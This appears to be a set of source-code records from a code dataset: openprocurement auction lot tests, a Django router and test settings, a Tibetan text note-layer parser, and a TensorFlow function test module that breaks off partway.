2a229e300b0e4e0c451789a6f0b05c492efab0e6 | 4,954 | py | Python | openprocurement/auctions/swiftsure/tests/lot.py | bdmbdsm/openprocurement.auctions.swiftsure | f5b93555eb12212c69c8168f861376eae85f4648 | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/swiftsure/tests/lot.py | bdmbdsm/openprocurement.auctions.swiftsure | f5b93555eb12212c69c8168f861376eae85f4648 | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/swiftsure/tests/lot.py | bdmbdsm/openprocurement.auctions.swiftsure | f5b93555eb12212c69c8168f861376eae85f4648 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import unittest
from openprocurement.auctions.core.tests.base import snitch
from openprocurement.auctions.core.tests.lot import AuctionLotResourceTestMixin, AuctionLotProcessTestMixin
from openprocurement.auctions.core.tests.blanks.lot_blanks import (
# AuctionLotFeatureResourceTest
auction_value,
auction_features_invalid,
# AuctionLotBidderResourceTest
create_auction_bidder_invalid,
patch_auction_bidder,
# AuctionLotFeatureBidderResourceTest
create_auction_bidder_invalid_feature,
create_auction_bidder_feature
)
from openprocurement.auctions.swiftsure.tests.base import (
BaseWebTest, BaseAuctionWebTest, test_lots, test_auction_data,
)
from openprocurement.auctions.swiftsure.tests.blanks.lot_blanks import (
# AuctionLotResourceTest
patch_auction_currency
)
@unittest.skip("option not available")
class AuctionLotResourceTest(BaseAuctionWebTest, AuctionLotResourceTestMixin):
test_lots = test_lots
test_auction_data = test_auction_data
test_patch_auction_currency = snitch(patch_auction_currency)
@unittest.skip("option not available")
class AuctionLotFeatureResourceTest(BaseAuctionWebTest):
initial_lots = 2 * test_lots
test_auction_data = test_auction_data
test_auction_value = snitch(auction_value)
test_auction_features_invalid = snitch(auction_features_invalid)
@unittest.skip("option not available")
class AuctionLotBidderResourceTest(BaseAuctionWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
test_create_auction_bidder_invalid = snitch(create_auction_bidder_invalid)
test_patch_auction_bidder = snitch(patch_auction_bidder)
@unittest.skip("option not available")
class AuctionLotFeatureBidderResourceTest(BaseAuctionWebTest):
initial_lots = test_lots
def setUp(self):
super(AuctionLotFeatureBidderResourceTest, self).setUp()
self.lot_id = self.initial_lots[0]['id']
response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {"data": {
"items": [
{
'relatedLot': self.lot_id,
'id': '1'
}
],
"features": [
{
"code": "code_item",
"featureOf": "item",
"relatedItem": "1",
"title": u"item feature",
"enum": [
{
"value": 0.01,
"title": u"good"
},
{
"value": 0.02,
"title": u"best"
}
]
},
{
"code": "code_lot",
"featureOf": "lot",
"relatedItem": self.lot_id,
"title": u"lot feature",
"enum": [
{
"value": 0.01,
"title": u"good"
},
{
"value": 0.02,
"title": u"best"
}
]
},
{
"code": "code_tenderer",
"featureOf": "tenderer",
"title": u"tenderer feature",
"enum": [
{
"value": 0.01,
"title": u"good"
},
{
"value": 0.02,
"title": u"best"
}
]
}
]
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']['items'][0]['relatedLot'], self.lot_id)
self.set_status('active.tendering')
test_create_auction_bidder_invalid_feature = snitch(create_auction_bidder_invalid_feature)
test_create_auction_bidder_feature = snitch(create_auction_bidder_feature)
@unittest.skip("option not available")
class AuctionLotProcessTest(BaseAuctionWebTest, AuctionLotProcessTestMixin):
setUp = BaseWebTest.setUp
test_lots = test_lots
test_auction_data = test_auction_data
def suite():
tests = unittest.TestSuite()
tests.addTest(unittest.makeSuite(AuctionLotResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotFeatureResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotBidderResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotFeatureBidderResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotProcessTest))
return tests
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 33.931507 | 107 | 0.571256 |
e6c584e0befef0b7d8541b91b80019ed095d79bb | 157 | py | Python | articlevue/routers.py | wesleymutwiri/articlevue | 04dbe278bea8e96dbc95bb1c986dbce025c0957a | [
"MIT"
] | null | null | null | articlevue/routers.py | wesleymutwiri/articlevue | 04dbe278bea8e96dbc95bb1c986dbce025c0957a | [
"MIT"
] | null | null | null | articlevue/routers.py | wesleymutwiri/articlevue | 04dbe278bea8e96dbc95bb1c986dbce025c0957a | [
"MIT"
] | null | null | null | from rest_framework import routers
from articles.viewsets import ArticleViewSet
router = routers.DefaultRouter()
router.register(r'articles',ArticleViewSet) | 31.4 | 44 | 0.853503 |
adf06274045e7a2d1567389e357a0a5d22561038 | 2,117 | py | Python | tests/settings.py | yunojuno/django-expiring-links | 1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48 | [
"MIT"
] | null | null | null | tests/settings.py | yunojuno/django-expiring-links | 1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48 | [
"MIT"
] | null | null | null | tests/settings.py | yunojuno/django-expiring-links | 1f8b98544327ce1e5ca4a9a2a3e0ca6e8dd33f48 | [
"MIT"
] | null | null | null | DEBUG = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": "test.db",
}
}
INSTALLED_APPS = (
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.sessions",
"django.contrib.contenttypes",
"django.contrib.messages",
"django.contrib.staticfiles",
"request_token",
"tests",
)
MIDDLEWARE = [
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"request_token.middleware.RequestTokenMiddleware",
]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
# insert your TEMPLATE_DIRS here
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"request_token.context_processors.request_token",
]
},
}
]
ALLOWED_HOSTS = ["localhost", "127.0.0.1"]
SECRET_KEY = "request_token" # noqa: S703,S105
ROOT_URLCONF = "tests.urls"
APPEND_SLASH = True
STATIC_URL = "/static/"
STATIC_ROOT = "./static"
TIME_ZONE = "UTC"
SITE_ID = 1
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s"
},
"simple": {"format": "%(levelname)s %(message)s"},
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "simple",
}
},
"loggers": {"request_token": {"handlers": ["console"], "level": "DEBUG"}},
}
if not DEBUG:
raise Exception("This project is only intended to be used for testing.")
| 24.905882 | 95 | 0.600378 |
cc309b1675eb85de43c0e67d3340f6af89529131 | 4,720 | py | Python | pedurma/preview_note_layer.py | Esukhia/pedurma | 334b5957db30f514d396bd9defc9e9381f5b290b | [
"MIT"
] | null | null | null | pedurma/preview_note_layer.py | Esukhia/pedurma | 334b5957db30f514d396bd9defc9e9381f5b290b | [
"MIT"
] | null | null | null | pedurma/preview_note_layer.py | Esukhia/pedurma | 334b5957db30f514d396bd9defc9e9381f5b290b | [
"MIT"
] | 1 | 2021-11-04T07:04:05.000Z | 2021-11-04T07:04:05.000Z | import re
from pathlib import Path
from uuid import uuid4
from pedurma.utils import to_yaml
def get_note_layer(note_annotation):
note_layer = {
"id": uuid4().hex,
"annotation_type": "PedurmaNote",
"revision": "00001",
"annotations": note_annotation,
}
return note_layer
def get_pages(vol_text):
result = []
pg_text = ""
pages = re.split(r"([0-9]+\-[0-9]+)", vol_text)
for i, page in enumerate(pages[0:]):
if i % 2 == 0:
pg_text += page
else:
pg_text += page
result.append(pg_text)
pg_text = ""
return result
def get_last_syl_and_note_match(note_pattern, note):
if re.search(r"ལྟར་བཀོད།", note):
last_syl = ""
elif re.search(r"#", note_pattern):
syls = re.split(r"#", note_pattern)
last_syl = syls[1]
else:
last_syl = note_pattern
note_match = last_syl + note
return last_syl, note_match
def parse_note(note, walker, page_content, plus_present):
note_ann = {}
note_pattern = re.search(rf"(:\S+)?{note}", page_content)
if plus_present:
plus_note = re.sub(r"\+", r"\+", note)
if re.search(rf"\S+་([^#]\S+་?){plus_note}", page_content):
note_pattern = re.search(rf"\S+་([^#]\S+་?){plus_note}", page_content)
last_syl, note_match = get_last_syl_and_note_match(
note_pattern.group(1), plus_note
)
grp_1_loc = page_content.find(last_syl + note)
else:
note_pattern = re.search(rf"([^#]\S+་?){plus_note}", page_content)
if note_pattern:
grp_1_loc = note_pattern.start()
last_syl = ""
ann_start = grp_1_loc + walker + len(last_syl)
ann_end = ann_start
else:
if note_pattern.group(1):
ann_start = note_pattern.start() + walker
ann_end = ann_start + len(note_pattern.group(1))
else:
if re.search(rf"\S+་([^#]\S+་?){note}", page_content):
note_pattern = re.search(rf"\S+་([^#]\S+་?){note}", page_content)
last_syl, note_match = get_last_syl_and_note_match(
note_pattern.group(1), note
)
grp_1_loc = page_content.find(note_match)
else:
note_pattern = re.search(rf"([^#]\S+་?){note}", page_content)
if note_pattern:
grp_1_loc = note_pattern.start()
last_syl = note_pattern.group(1)
ann_start = grp_1_loc + walker
if note_pattern.group(1):
ann_end = ann_start + len(last_syl)
else:
ann_end = ann_start
note_ann = {
"span": {
"start": ann_start, # the variant unit or variant location is capture with help of this span
"end": ann_end,
},
"collation_note": note,
}
page_content = re.sub(note, "", page_content, 1)
return note_ann, page_content
def parse_page(page, note_annotation, char_walker):
cur_note = {}
page = page.replace("\n", "#")
page_content = re.sub(r"(\([༠-༩]+\)\s)", "", page)
notes = re.findall(r"\<.*?\>", page_content)
for note in notes:
match = re.search(r"(\<.*?)(\+)(.*?\>)", note)
if match:
if match.group(2):
note_info, page_content = parse_note(
note, char_walker, page_content, True
)
else:
note_info, page_content = parse_note(note, char_walker, page_content, False)
cur_note[uuid4().hex] = note_info
note_annotation.update(cur_note)
cur_note = {}
new_page = base_extract(page)
return note_annotation, new_page
def base_extract(text):
text = re.sub(r"#", "\n", text)
return re.sub(r"(\([༠-༩]+\)\s)?<.*?>", "", text)
def build_note_layer(text):
char_walker = 0
note_annotation = {}
pages = get_pages(text)
for page in pages:
page = re.sub(r"([0-9]+\-[0-9]+)", "\n", page)
note_annotation, new_page = parse_page(page, note_annotation, char_walker)
char_walker += len(new_page) - 1
note_layer = get_note_layer(note_annotation)
return note_layer
def update_hybird_pecha_note_layer(preview_text, hybird_pecha_path, vol_num):
hybird_pecha_path = Path(hybird_pecha_path)
note_layer = build_note_layer(preview_text)
note_yml = to_yaml(note_layer)
note_yml_path = (
hybird_pecha_path
/ f"{hybird_pecha_path.stem}.opf"
/ "layers"
/ f"v{vol_num:03}"
/ "PedurmaNote.yml"
)
note_yml_path.write_text(note_yml, encoding="utf-8")
| 32.777778 | 105 | 0.56822 |
1660be13574adc9918303a3b841f86b8ffecc4d8 | 26,786 | py | Python | tensorflow/python/framework/function_test.py | RMORIOKA/tensorflow | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/function_test.py | RMORIOKA/tensorflow | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/function_test.py | RMORIOKA/tensorflow | 6886eb9c73940fd3b4dfadc3d6964ae9aa71eef6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import function
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_logging_ops
def _OptimizerOptions():
for cse in [False, True]:
for inline in [False, True]:
for cfold in [False, True]:
yield tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=cse,
do_function_inlining=inline,
do_constant_folding=cfold)))
class FunctionTest(tf.test.TestCase):
def testDefineFunction2Args(self):
@function.Defun(tf.float32, tf.float32, func_name="APlus2B")
def APlus2B(a, b):
return a + b * 2
with tf.Graph().as_default():
call = APlus2B([1.0], [2.0])
self.assertEqual("APlus2B", call.op.name)
with tf.Session() as sess:
self.assertAllEqual([5.0], sess.run(call))
def testGradientFunc(self):
@function.Defun(tf.float32, func_name="XSquarePlusOneFn")
def XSquarePlusOne(x):
return x * x + 1.0
@function.Defun(tf.float32, tf.float32)
def XSquarePlusOneGrad(x, dy):
dx = functional_ops._symbolic_gradient(
input=[x, dy], Tout=[tf.float32], f="XSquarePlusOneFn", name="dx")
return dx
g = tf.Graph()
with g.as_default():
call_f = XSquarePlusOne([2.0])
call_g = XSquarePlusOneGrad([2.0], [0.1])
with tf.Session() as sess:
self.assertAllClose([5.0], sess.run(call_f))
self.assertAllClose([0.4], sess.run(call_g))
def testTanhSymGrad(self):
@function.Defun(tf.float32)
def Forward(x):
return tf.reduce_sum(tf.tanh(x))
g = tf.Graph()
with g.as_default():
x = tf.placeholder(tf.float32)
y = Forward(x)
dx = tf.gradients([y], [x])
inp = np.array([-1, 1, 2, -2], dtype=np.float32)
feed = {x: inp}
cfg = tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=True)))
with tf.Session(graph=g, config=cfg) as sess:
out, = sess.run(dx, feed)
self.assertAllClose(1 - np.square(np.tanh(inp)), out)
def testCustomGradient(self):
dtype = tf.float32
@function.Defun(dtype, dtype, dtype)
def XentLossGrad(logits, labels, dloss):
dlogits = tf.reshape(dloss, [-1, 1]) * (tf.nn.softmax(logits) - labels)
dlabels = tf.zeros_like(labels)
# Takes exp(dlogits) to differentiate it from the "correct" gradient.
return tf.exp(dlogits), dlabels
@function.Defun(dtype, dtype, grad_func=XentLossGrad)
def XentLoss(logits, labels):
return tf.reduce_sum(labels * tf.log(tf.nn.softmax(logits)), 1)
g = tf.Graph()
with g.as_default():
logits = tf.placeholder(dtype)
labels = tf.placeholder(dtype)
loss = XentLoss(logits, labels)
dlogits = tf.gradients([loss], [logits])
x = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32)
prob = np.exp(x) / np.sum(np.exp(x), 1, keepdims=1)
y = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32)
for cfg in _OptimizerOptions():
tf.logging.info("cfg = %s", cfg)
with tf.Session(graph=g, config=cfg) as sess:
out, = sess.run(dlogits, {logits: x, labels: y})
self.assertAllClose(out, np.exp(prob - y))
def testCustomGradientError(self):
dtype = tf.float32
@function.Defun(dtype, dtype, dtype)
def Grad(x, dy, dz):
# Should have returned 1 result.
return x, dy + dz
@function.Defun(dtype, grad_func=Grad)
def Forward(x):
return x, x
g = tf.Graph()
with g.as_default():
inp = tf.placeholder(dtype)
out = tf.add_n(Forward(inp))
dinp = tf.gradients(out, [inp])
x = np.random.uniform(-10., 10., size=(4, 9)).astype(np.float32)
with tf.Session(graph=g) as sess:
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
"SymGrad expects to return 1.*but get 2.*instead"):
_ = sess.run(dinp, {inp: x})
def testSymGradShape(self):
g = tf.Graph()
with g.as_default():
x = tf.placeholder(tf.float32, [25, 4])
y = tf.placeholder(tf.float32, [200, 100])
dz = tf.placeholder(tf.float32, [1])
# We assume Foo is a function of (x, y) -> (z) Then, Foo's
# gradient function is (x, y, dz) -> (dx, dy). dx's shape
# should be the same as x's; and dy's shape should be the same
# as y's.
dx, dy = functional_ops._symbolic_gradient(
input=[x, y, dz], Tout=[tf.float32] * 2, f="Foo")
self.assertEqual(x.get_shape(), dx.get_shape())
self.assertEqual(y.get_shape(), dy.get_shape())
def testSymGradAttr(self):
@function.Defun(noinline=True)
def Foo(x):
return x * 2
self.assertTrue(
Foo.instantiate([tf.float32]).definition.attr["_noinline"].b)
g = tf.Graph()
with g.as_default():
x = tf.constant(3.0)
y = Foo(x)
dx, = tf.gradients(y, [x])
cfg = tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=True,
do_function_inlining=True,
do_constant_folding=True)))
with self.test_session(graph=g, config=cfg):
self.assertAllClose(y.eval(), 6.)
self.assertAllClose(dx.eval(), 2.)
def testZNoDepOnY(self):
@function.Defun(tf.float32, tf.float32)
def Foo(x, y): # pylint: disable=unused-argument
return x * 2
with tf.Graph().as_default():
# z = Foo(x, y). z doe
x = tf.constant(1.0)
y = tf.constant(2.0)
z = Foo(x, y)
dx, dy = tf.gradients([z], [x, y])
with tf.Session() as sess:
dx_val, dy_val = sess.run([dx, dy])
self.assertEqual([2.0], dx_val)
self.assertEqual([0.0], dy_val)
def testDefineFunctionNoArgs(self):
@function.Defun(func_name="AConstant")
def AConstant():
return tf.constant([42])
with tf.Graph().as_default():
call = AConstant()
self.assertEqual("AConstant", call.op.name)
with tf.Session() as sess:
self.assertAllEqual([42], sess.run(call))
def testDefineFunctionNames(self):
@function.Defun(tf.float32, func_name="Foo")
def Foo(a):
return a + 1
with tf.Graph().as_default():
call1 = Foo([1.0])
self.assertEqual("Foo", call1.op.name)
call2 = Foo([1.0])
self.assertEqual("Foo_1", call2.op.name)
# pylint: disable=unexpected-keyword-arg
call3 = Foo([1.0], name="mine")
self.assertEqual("mine", call3.op.name)
with tf.name_scope("my"):
call4 = Foo([1.0], name="precious")
self.assertEqual("my/precious", call4.op.name)
def testNoOp(self):
@function.Defun(tf.float32)
def Foo(x):
y = tf.Print(x, [x], "Hello")
with tf.control_dependencies([y]):
z = tf.no_op()
with tf.control_dependencies([z]):
return x * 2
with tf.Graph().as_default(), self.test_session():
z = Foo(tf.constant(3.0))
self.assertAllEqual(z.eval(), 6.0)
def testAssertOp(self):
@function.Defun(tf.float32)
def Foo(x):
check = gen_logging_ops._assert(tf.greater(x, 0), [x])
with tf.control_dependencies([check]):
return x * 2
g = tf.Graph()
with g.as_default(), self.test_session():
self.assertAllEqual(Foo(tf.constant(3.0)).eval(), 6.0)
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,
"assertion failed.*-3"):
self.assertAllEqual(Foo(tf.constant(-3.0)).eval(), 6.0)
def testAssertWrapper(self):
@function.Defun(tf.float32)
def MyFn(x):
with tf.control_dependencies([tf.Assert(tf.less_equal(x, 10.0), [x])]):
return tf.identity(x)
with self.test_session():
self.assertEqual(1.0, MyFn(1.0).eval())
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, "assertion"):
_ = MyFn(100.0).eval()
def testVar(self):
@function.Defun(tf.float32)
def Foo(x):
return x * x + 1
g = tf.Graph()
with g.as_default():
v = tf.Variable(tf.constant(10.0))
z = Foo(v)
with self.test_session(graph=g):
tf.global_variables_initializer().run()
self.assertAllEqual(z.eval(), 101.)
def testDefineErrors(self):
with tf.Graph().as_default():
with self.assertRaisesRegexp(ValueError, "can not return None"):
@function.Defun()
def NoResult():
pass
_ = NoResult.definition
with self.assertRaisesRegexp(ValueError, "can not return None"):
@function.Defun()
def TwoNone():
return None, None
_ = TwoNone.definition
with self.assertRaisesRegexp(ValueError, "are not supported"):
@function.Defun()
def DefaultArg(unused_a=12):
return tf.constant([1])
_ = DefaultArg.definition
with self.assertRaisesRegexp(ValueError, "are not supported"):
@function.Defun()
def KwArgs(**unused_kwargs):
return tf.constant([1])
_ = KwArgs.definition
with self.assertRaisesRegexp(ValueError, "specified input types"):
@function.Defun(tf.float32)
def PlusMinusV2(a, b):
return a + b, b - a
_ = PlusMinusV2.definition
with self.assertRaisesRegexp(ValueError, "specified input types"):
@function.Defun(tf.float32, tf.float32, tf.float32)
def PlusMinusV3(a, b):
return a + b, b - a
_ = PlusMinusV3.definition
def testCallErrors(self):
@function.Defun()
def Const():
return tf.constant(1)
@function.Defun(tf.int32)
def PlusOne(a):
return a + 1
@function.Defun(tf.int32, tf.int32)
def PlusMinus(a, b):
return a + b, b - a
with tf.Graph().as_default():
_ = Const()
# pylint: disable=too-many-function-args
# pylint: disable=unexpected-keyword-arg
# pylint: disable=no-value-for-parameter
with self.assertRaisesRegexp(ValueError, "arguments: 0"):
_ = Const(1)
with self.assertRaisesRegexp(ValueError, "arguments: 0"):
_ = Const(1, 2)
with self.assertRaisesRegexp(ValueError, "arguments: 1"):
_ = PlusOne()
_ = PlusOne(1)
with self.assertRaisesRegexp(ValueError, "arguments: 1"):
_ = PlusOne(1, 2)
with self.assertRaisesRegexp(ValueError, "arguments: 2"):
_ = PlusMinus()
with self.assertRaisesRegexp(ValueError, "arguments: 2"):
_ = PlusMinus(1)
_ = PlusMinus(1, 2)
_ = PlusOne(1, name="p1")
with self.assertRaisesRegexp(ValueError, "Unknown keyword arguments"):
_ = PlusOne(1, device="/gpu:0")
def testFunctionDecorator(self):
@function.Defun(tf.float32, func_name="Minus1")
def Minus1(b):
return b - 1.0
with tf.Graph().as_default():
call1 = Minus1([2.])
self.assertTrue(isinstance(Minus1, function._DefinedFunction))
self.assertEqual(Minus1.name, "Minus1")
# pylint: disable=unexpected-keyword-arg
call2 = Minus1(call1, name="next")
# pylint: enable=unexpected-keyword-arg
self.assertEqual("next", call2.op.name)
with tf.Session() as sess:
self.assertAllEqual([1], sess.run(call1))
self.assertAllEqual([0], sess.run(call2))
def testNestedFunction(self):
@function.Defun(tf.float32)
def Cube(x):
return x * x * x
@function.Defun(tf.float32, tf.float32)
def CubeXPlusY(x, y):
return Cube(x) + y
with tf.Graph().as_default():
z = CubeXPlusY(3.0, -2.0)
with self.test_session():
self.assertAllEqual(z.eval(), 25.0)
def testNestedDefinedFunction(self):
@function.Defun(tf.float32, tf.float32)
def CubeXPlusY(x, y):
@function.Defun(tf.float32)
def Cube(x):
return x * x * x
return Cube(x) + y
with tf.Graph().as_default():
z = CubeXPlusY(3.0, -2.0)
with self.test_session():
self.assertAllEqual(z.eval(), 25.0)
def testUnusedFunction(self):
invoked = False
# pylint: disable=unused-variable
@function.Defun()
def Unused():
invoked = True
return tf.constant(42.)
self.assertFalse(invoked)
g = tf.Graph()
with g.as_default():
@function.Defun()
def Unused2():
invoked = True
return tf.constant(7.)
tf.constant(3.)
# pylint: enable=unused-variable
self.assertFalse(invoked)
gdef = g.as_graph_def()
self.assertEqual(0, len(gdef.library.function))
def testReduction(self):
g = tf.Graph()
# BN0 is computing batch normed matrix along rows.
def BN0(x):
mean = tf.reduce_mean(x, [0])
var = tf.reduce_mean(tf.square(x - mean)) # biased var
rstd = tf.rsqrt(var + 1e-8)
return (x - mean) * rstd
# Wraps BatchNorm in a tf function.
@function.Defun(tf.float32)
def BN1(x):
return BN0(x)
with g.as_default():
x = tf.placeholder(tf.float32)
y0 = BN0(x) # A plain graph
y1 = BN1(x) # A tf function
dx0, = tf.gradients([y0], [x])
dx1, = tf.gradients([y1], [x])
# Both should produce the same result and gradient.
with self.test_session(graph=g) as sess:
vals = sess.run([y0, y1, dx0, dx1], {x: np.random.uniform(size=(3, 7))})
self.assertAllClose(vals[0], vals[1])
self.assertAllClose(vals[2], vals[3])
def testDeclareTypeMistake(self):
foo = function.Declare("Foo", [tf.float32], [tf.float32])
@function.Defun(tf.float32, func_name="Foo")
def Foo(x):
return x * x + 1
g = tf.Graph()
with g.as_default():
y = foo(2.0)
with self.test_session(graph=g):
with self.assertRaisesRegexp(tf.errors.NotFoundError, "not registered"):
_ = y.eval()
g = tf.Graph()
with g.as_default():
Foo.add_to_graph(g)
y = foo(2)
with self.test_session(graph=g):
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError,
"int32.*float"):
_ = y.eval()
g = tf.Graph()
with g.as_default():
Foo.add_to_graph(g)
with self.assertRaisesRegexp(
ValueError, "Expected number of arguments: 1, received: 2"):
_ = foo(2.0, 2.0)
g = tf.Graph()
with g.as_default():
Foo.add_to_graph(g)
y = foo(2.0)
with self.test_session(graph=g):
self.assertAllEqual(y.eval(), 5.0)
def testCapture(self):
g = tf.Graph()
with g.as_default():
w = tf.Variable(tf.constant([[1.0]]))
b = tf.Variable(tf.constant([2.0]))
# Foo() captures w and b.
@function.Defun(tf.float32)
def Foo(x):
# Plus() captures b.
@function.Defun(tf.float32)
def Plus(y):
return y + b
return Plus(tf.matmul(w, x))
y = Foo(tf.constant([[10.]]))
with self.test_session(graph=g):
tf.global_variables_initializer().run()
self.assertAllEqual(y.eval(), [[12.0]])
def testCaptureControls(self):
g = tf.Graph()
with g.as_default():
x = tf.constant([10.0])
x = tf.Print(x, [x], "outer")
@function.Defun(tf.float32)
def Foo(y):
with tf.control_dependencies([x]):
y = tf.Print(y, [y], "inner")
return y
with self.assertRaisesRegexp(ValueError, "not an element of this graph."):
# NOTE: We still do not support capturing control deps.
_ = Foo(x)
def testStableName(self):
@function.Defun()
def Foo(x, y, z):
return tf.tanh(tf.matmul(x, y) + z)
self.assertEqual("Foo_158cce4d", Foo.instantiate([tf.float32] * 3).name)
class FunctionOverloadTest(tf.test.TestCase):
def testBasic(self):
@function.Defun()
def Sinh(x):
return 1 / 2. * (tf.exp(x) - tf.exp(-x))
g = tf.Graph()
with g.as_default():
x = Sinh(tf.constant(0.25, tf.float32))
y = Sinh(tf.constant(0.25, tf.float64))
with self.test_session(graph=g):
self.assertAllClose(x.eval(), np.sinh(0.25))
self.assertAllClose(y.eval(), np.sinh(0.25))
def testGradient(self):
@function.Defun(func_name="Spec")
def G(x, dy):
return x * dy
@function.Defun(grad_func=G)
def F(x):
return tf.exp(x) - tf.exp(-x)
for dtype in [tf.float32, tf.float64]:
g = tf.Graph()
with g.as_default():
x = tf.constant(0.25, dtype)
y = F(x)
dx, = tf.gradients(y, x)
with self.test_session(graph=g):
self.assertAllClose(dx.eval(), 0.25)
def testDocString(self):
@function.Defun()
def Foo(x):
"""Successor of x."""
return x + 1
g = tf.Graph()
with g.as_default():
_ = Foo(1)
self.assertEqual(g.as_graph_def().library.function[0].signature.description,
"Successor of x.")
class UnrollLSTMTest(tf.test.TestCase):
BATCH_SIZE = 16
LSTM_DIMS = 32
NUM_UNROLL = 20
def _Weights(self):
dims = self.LSTM_DIMS
return tf.random_uniform([2 * dims, 4 * dims], -1, 1, seed=123456)
def _Input(self):
return tf.random_uniform(
[self.NUM_UNROLL, self.BATCH_SIZE, self.LSTM_DIMS], seed=654321)
# Helper to construct a LSTM cell graph.
@classmethod
def LSTMCell(cls, x, mprev, cprev, weights):
xm = tf.concat(1, [x, mprev])
i_i, i_g, f_g, o_g = tf.split(1, 4, tf.matmul(xm, weights))
new_c = tf.sigmoid(f_g) * cprev + tf.sigmoid(i_g) * tf.tanh(i_i)
new_c = tf.clip_by_value(new_c, -50.0, 50.0)
new_m = tf.sigmoid(o_g) * tf.tanh(new_c)
return new_m, new_c
def _BuildForward(self, weights, inp, mode="cell"):
def Loop(cell, w, i):
x = tf.unstack(i, self.NUM_UNROLL)
m = tf.zeros_like(x[0])
c = tf.zeros_like(x[0])
for i in range(self.NUM_UNROLL):
m, c = cell(x[i], m, c, w)
return m
cell = UnrollLSTMTest.LSTMCell
if mode == "complete":
# Constructs the complete graph in python.
return Loop(cell, weights, inp)
cell = function.Defun(tf.float32, tf.float32, tf.float32, tf.float32)(cell)
if mode == "cell":
# Just represent the LSTM as a function.
return Loop(cell, weights, inp)
if mode == "loop":
# Wraps the whole loop as a function.
@function.Defun(tf.float32, tf.float32)
def LSTMLoop(w, i):
return Loop(cell, w, i)
return LSTMLoop(weights, inp)
if mode == "loop10":
# Wraps 10 lstm steps into one function, and the whole loop
# into another calling the formers.
# Groups 10 steps at a time.
@function.Defun(tf.float32, tf.float32, tf.float32, *([tf.float32] * 10))
def Loop10(w, m, c, *args):
for x in args:
m, c = cell(x, m, c, w)
return m, c
@function.Defun(tf.float32, tf.float32)
def LSTMLoop10(weights, inp):
x = tf.unstack(inp, self.NUM_UNROLL)
m = tf.zeros_like(x[0])
c = tf.zeros_like(x[0])
assert self.NUM_UNROLL % 10 == 0
for i in range(0, self.NUM_UNROLL, 10):
m, c = Loop10(weights, m, c, *x[i:i + 10])
return m
return LSTMLoop10(weights, inp)
def testUnrollLSTM(self):
# Run one step of the unrolled lstm graph.
def RunForward(mode, cfg=None):
tf.logging.info("mode = %s", mode)
g = tf.Graph()
start = time.time()
with g.as_default():
weights = self._Weights()
inp = self._Input()
m = self._BuildForward(weights, inp, mode)
gdef = g.as_graph_def()
finish = time.time()
tf.logging.info("time: %f txt size: %d gdef bin size: %d", finish - start,
len(str(gdef)), len(gdef.SerializeToString()))
with g.as_default(), tf.Session(config=cfg) as sess:
return sess.run(m)
mv0 = RunForward("complete")
for cfg in _OptimizerOptions():
tf.logging.info("cfg = %s", cfg)
mv1 = RunForward("cell", cfg)
mv2 = RunForward("loop", cfg)
mv3 = RunForward("loop10", cfg)
self.assertAllClose(mv0, mv1, rtol=1e-4)
self.assertAllClose(mv0, mv2, rtol=1e-4)
self.assertAllClose(mv0, mv3, rtol=1e-4)
def testUnrollLSTMGrad(self):
# Run one step of the unrolled lstm graph.
def RunForwardBackward(mode, cfg=None):
tf.logging.info("mode = %s", mode)
g = tf.Graph()
start = time.time()
with g.as_default():
